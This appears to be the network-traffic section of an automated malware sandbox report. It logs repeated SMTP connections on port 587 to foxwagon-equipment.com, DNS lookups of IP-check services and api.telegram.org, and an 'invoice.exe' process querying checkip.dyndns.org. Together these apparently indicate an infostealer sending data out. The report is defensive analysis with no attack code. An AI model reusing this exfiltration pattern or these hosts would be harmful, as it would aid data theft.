Oct 1, 2024 06:19:52.583668947 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:52.588608027 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:52.749480009 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:52.751990080 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:52.756838083 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:52.920582056 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:52.924060106 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:52.928934097 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:53.113487005 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:53.113498926 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:53.113509893 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:53.113517046 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:53.113646984 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:53.204332113 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:53.206368923 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:53.211235046 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:53.372948885 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:53.374174118 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:53.379111052 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:53.548352957 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:53.548636913 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:53.553507090 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:53.760046959 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:53.762758017 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:53.767611027 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:53.938015938 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:53.938251972 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:53.943110943 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:54.103600979 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:54.107314110 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:54.112297058 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:54.286516905 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:54.286919117 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:54.291851044 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:54.454379082 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:54.454814911 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:54.454814911 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:54.454904079 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:54.454967022 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:54.459712029 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:54.459717989 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:54.459791899 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:54.459808111 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:54.920883894 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:54.921556950 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:54.926440001 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:55.085810900 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:55.086395979 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:55.088428020 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:55.093285084 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:55.093468904 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:55.656263113 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:55.656512976 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:55.661413908 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:55.826982021 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:55.827230930 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:55.832083941 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:55.990618944 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:55.991014957 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:55.995871067 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:56.183114052 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:56.183146954 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:56.183163881 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:56.183180094 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:56.183187962 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:56.183209896 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:56.271645069 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:56.273227930 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:56.278037071 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:56.433468103 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:56.434379101 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:56.439254999 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:56.595717907 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:56.596038103 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:56.600888968 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:56.756844044 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:56.757150888 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:56.761960983 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:56.926485062 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:56.926855087 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:56.931684971 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:57.088036060 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:57.088334084 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:57.093195915 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:57.300441027 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:57.300714970 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:57.305552006 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:57.461466074 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:57.464445114 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:57.464521885 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:57.464550972 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:57.464572906 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:57.469374895 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:57.469388008 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:57.469409943 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:57.469422102 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:57.705080986 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:57.705837011 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:57.710724115 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:57.868010998 CEST	587	50489	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:57.868462086 CEST	50489	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:57.869581938 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:57.875391960 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:57.875452995 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:58.432950020 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:58.435995102 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:58.440817118 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:58.594486952 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:58.594708920 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:58.599551916 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:58.762013912 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:58.767404079 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:58.772294044 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:58.980396986 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:58.980413914 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:58.980428934 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:58.980438948 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:58.980557919 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:58.980557919 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:59.067084074 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:59.069428921 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:59.074278116 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:59.235279083 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:59.236252069 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:59.241107941 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:59.394556046 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:59.394787073 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:59.399626970 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:59.570008993 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:59.570332050 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:59.575198889 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:59.780424118 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:59.780620098 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:59.785449982 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:59.938517094 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:59.938687086 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:59.943525076 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:00.112608910 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:00.112802029 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:00.117654085 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:00.271177053 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:00.273050070 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:00.273077011 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:00.273077011 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:00.273123026 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:00.277888060 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:00.277892113 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:00.278024912 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:00.278028965 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:00.507602930 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:00.513808012 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:00.518752098 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:00.675504923 CEST	587	50490	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:00.675899982 CEST	50490	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:00.676640034 CEST	50491	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:00.681519985 CEST	587	50491	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:00.681603909 CEST	50491	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:01.244245052 CEST	587	50491	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:01.244400978 CEST	50491	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:01.249409914 CEST	587	50491	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:01.407757998 CEST	587	50491	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:01.408027887 CEST	50491	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:01.412893057 CEST	587	50491	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:01.552253008 CEST	50491	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:01.554563046 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:01.557543993 CEST	587	50491	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:01.557609081 CEST	50491	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:01.559397936 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:01.559453964 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:02.172878027 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:02.173316956 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:02.178174973 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:02.343900919 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:02.344153881 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:02.349232912 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:02.510256052 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:02.511539936 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:02.516450882 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:02.707005024 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:02.707020998 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:02.707030058 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:02.707041025 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:02.707089901 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:02.707127094 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:02.797588110 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:02.798883915 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:02.803705931 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:02.962044954 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:02.962799072 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:02.967636108 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:03.127553940 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:03.127749920 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:03.132639885 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:03.292356968 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:03.292666912 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:03.297537088 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:03.484419107 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:03.484605074 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:03.489429951 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:03.673237085 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:03.673430920 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:03.678332090 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:03.914505005 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:03.914685011 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:03.919656992 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:04.084743977 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:04.084995985 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:04.085089922 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:04.085156918 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:04.085179090 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:04.089871883 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:04.089884043 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:04.089983940 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:04.089991093 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:04.415993929 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:04.416745901 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:04.421650887 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:04.584469080 CEST	587	50492	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:04.584919930 CEST	50492	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:04.587811947 CEST	50493	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:04.592639923 CEST	587	50493	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:04.592775106 CEST	50493	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:05.285984039 CEST	587	50493	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:05.416805983 CEST	50493	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:05.849674940 CEST	50493	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:05.849822998 CEST	50493	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:05.850500107 CEST	50494	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:05.854679108 CEST	587	50493	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:05.854995966 CEST	587	50493	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:05.855057955 CEST	50493	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:05.855319023 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:05.855429888 CEST	50494	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:06.452809095 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:06.457964897 CEST	50494	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:06.463419914 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:06.618541002 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:06.621649027 CEST	50494	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:06.626511097 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:06.789107084 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:06.789494038 CEST	50494	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:06.794327974 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:06.979851961 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:06.979863882 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:06.979875088 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:06.979881048 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:06.980285883 CEST	50494	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:07.066561937 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:07.068095922 CEST	50494	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:07.072967052 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:07.236104965 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:07.236959934 CEST	50494	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:07.241856098 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:07.403203011 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:07.403418064 CEST	50494	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:07.408281088 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:07.563694000 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:07.563954115 CEST	50494	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:20:07.568861961 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:07.754060984 CEST	587	50494	198.54.114.247	192.168.2.4
Oct 1, 2024 06:20:07.801440954 CEST	50494	587	192.168.2.4	198.54.114.247

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 06:16:01.023071051 CEST	63620	53	192.168.2.4	1.1.1.1
Oct 1, 2024 06:16:01.030262947 CEST	53	63620	1.1.1.1	192.168.2.4
Oct 1, 2024 06:16:01.955430984 CEST	58670	53	192.168.2.4	1.1.1.1
Oct 1, 2024 06:16:01.962666035 CEST	53	58670	1.1.1.1	192.168.2.4
Oct 1, 2024 06:16:12.910830975 CEST	60366	53	192.168.2.4	1.1.1.1
Oct 1, 2024 06:16:12.918035030 CEST	53	60366	1.1.1.1	192.168.2.4
Oct 1, 2024 06:16:19.225605965 CEST	50304	53	192.168.2.4	1.1.1.1
Oct 1, 2024 06:16:19.280791998 CEST	53	50304	1.1.1.1	192.168.2.4
Oct 1, 2024 06:16:30.932849884 CEST	53	58210	162.159.36.2	192.168.2.4
Oct 1, 2024 06:16:31.435158968 CEST	52935	53	192.168.2.4	1.1.1.1
Oct 1, 2024 06:16:31.443023920 CEST	53	52935	1.1.1.1	192.168.2.4
Oct 1, 2024 06:16:49.524215937 CEST	52899	53	192.168.2.4	1.1.1.1
Oct 1, 2024 06:16:49.557847977 CEST	53	52899	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 1, 2024 06:16:01.023071051 CEST	192.168.2.4	1.1.1.1	0x938e	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 1, 2024 06:16:01.955430984 CEST	192.168.2.4	1.1.1.1	0x1947	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 1, 2024 06:16:12.910830975 CEST	192.168.2.4	1.1.1.1	0x2ea7	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Oct 1, 2024 06:16:19.225605965 CEST	192.168.2.4	1.1.1.1	0x325a	Standard query (0)	foxwagon-equipment.com	A (IP address)	IN (0x0001)	false
Oct 1, 2024 06:16:31.435158968 CEST	192.168.2.4	1.1.1.1	0xc603	Standard query (0)	171.39.242.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Oct 1, 2024 06:16:49.524215937 CEST	192.168.2.4	1.1.1.1	0x6c57	Standard query (0)	foxwagon-equipment.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 1, 2024 06:16:01.030262947 CEST	1.1.1.1	192.168.2.4	0x938e	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 1, 2024 06:16:01.030262947 CEST	1.1.1.1	192.168.2.4	0x938e	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 1, 2024 06:16:01.030262947 CEST	1.1.1.1	192.168.2.4	0x938e	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 1, 2024 06:16:01.030262947 CEST	1.1.1.1	192.168.2.4	0x938e	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 1, 2024 06:16:01.030262947 CEST	1.1.1.1	192.168.2.4	0x938e	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 1, 2024 06:16:01.030262947 CEST	1.1.1.1	192.168.2.4	0x938e	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 1, 2024 06:16:01.962666035 CEST	1.1.1.1	192.168.2.4	0x1947	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 1, 2024 06:16:01.962666035 CEST	1.1.1.1	192.168.2.4	0x1947	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 1, 2024 06:16:12.918035030 CEST	1.1.1.1	192.168.2.4	0x2ea7	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Oct 1, 2024 06:16:19.280791998 CEST	1.1.1.1	192.168.2.4	0x325a	No error (0)	foxwagon-equipment.com		198.54.114.247	A (IP address)	IN (0x0001)	false
Oct 1, 2024 06:16:31.443023920 CEST	1.1.1.1	192.168.2.4	0xc603	Name error (3)	171.39.242.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Oct 1, 2024 06:16:49.557847977 CEST	1.1.1.1	192.168.2.4	0x6c57	No error (0)	foxwagon-equipment.com		198.54.114.247	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	132.226.247.73	80	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 06:16:01.039355040 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 06:16:01.708857059 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:01 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c811f1dcf34d6c45d2e7ef90a25ac799 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 1, 2024 06:16:01.712639093 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
